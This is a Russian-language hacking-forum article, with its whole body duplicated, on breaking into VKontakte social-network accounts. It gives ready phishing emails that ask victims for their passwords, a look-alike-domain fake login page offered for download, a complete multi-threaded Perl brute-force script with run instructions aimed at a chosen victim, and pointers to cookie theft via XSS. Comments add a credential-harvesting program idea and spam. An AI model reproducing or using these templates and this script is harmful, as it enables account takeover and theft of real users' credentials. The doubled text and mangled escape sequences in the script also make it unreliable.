Взлом вконтакте, контакта, vkontakte.ru — HackZona.Ru
Взлом вконтакте, контакта, vkontakte.ru
Взлом вконтакте, контакта, vkontakte.ru
Тип статьи:
Со старой ХакЗоны.
Источник:
Введение
В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.
Очень много людей просят взломать страницу, из своих личных побуждений.
Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.
Для тех, кто понимает, о чём я, продолжаем.
ID это как уник. код юзера, то есть, например серийный номер машины.
Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля vkontakte.ru/id5185**6?31892
ID получится 5185**6, то есть, то, что начинается от id и то знака?.. Если нету знака? то идёт до конца.
Некоторые способы взлома:
1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру «[email protected]», «[email protected]», с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:
EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: [email protected]
PA: 123456
Чтоб не было путаницы, в теме письма укажите тему «Обновление».
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 19107)
3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру «[email protected]», «[email protected]», с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.
Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass: shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut;, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock «HEAD vkontakte.ru/ HTTP/1.0rn».
«Host: vkontakte.rurn».
«Accept: */*rn».
«Content-Type: application/x-www-form-urlencodedrn».
«User-Agent: Mozillorn».
«Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn».
«Connection: closernrn»;
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5n";
print "$id:$pass:$md5n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
--------------------------------------------------------------------------------
Цитата:
--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------
Как запустить скрипт:
Цитата:
--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше… меняем id и мыло жертвы на нужное, сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся…
6. создастся good.txt, где и будет ваш пасс.
Vkontakte bruteforce ©serber
vkontakte_bruteforce.rar
или
vkontakte.exe
Словари тут.
5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.
Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.
Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте.
В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.
Очень много людей просят взломать страницу, из своих личных побуждений.
Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.
Для тех, кто понимает, о чём я, продолжаем.
ID это как уник. код юзера, то есть, например серийный номер машины.
Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля vkontakte.ru/id5185**6?31892
ID получится 5185**6, то есть, то, что начинается от id и то знака?.. Если нету знака? то идёт до конца.
Некоторые способы взлома:
1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру «[email protected]», «[email protected]», с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:
EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: [email protected]
PA: 123456
Чтоб не было путаницы, в теме письма укажите тему «Обновление».
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 19107)
3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру «[email protected]», «[email protected]», с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.
Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.
Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass: shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut;, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock «HEAD vkontakte.ru/ HTTP/1.0rn».
«Host: vkontakte.rurn».
«Accept: */*rn».
«Content-Type: application/x-www-form-urlencodedrn».
«User-Agent: Mozillorn».
«Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn».
«Connection: closernrn»;
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5n";
print "$id:$pass:$md5n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
--------------------------------------------------------------------------------
Цитата:
--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------
Как запустить скрипт:
Цитата:
--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше… меняем id и мыло жертвы на нужное, сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся…
6. создастся good.txt, где и будет ваш пасс.
Vkontakte bruteforce ©serber
vkontakte_bruteforce.rar
или
vkontakte.exe
Словари тут.
5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.
Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.
Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте.
25 комментариев
если хотите стать хакером сторайтес быть независимыми
гуглите (заходите в какою нибудь поисковую систему, например google, rambler, ya (yandex) и т.д., и пишете в поисковой строке: скачать словари для брутов или т.д.)
Проводица АКЦИЯ на бесплатные подарки!!
Куча Халявы,без всяких Вложений!!
Зайди и прочти!!
http://nigma.ru/c&CASPERmc
===-+-===-+-===-+-===-+-===-+-===-+-===-+-===-+-
в строчках, где объявляется сокет в конце каждой строчки должно стоять rn, а не rn как тут написано
6: Пишем программу например на Delphi, где надо вводить мыло и пароль, втираемся юзеру в доверие, скидываем прогу, и ждем когда на мыло прийдет его данные:)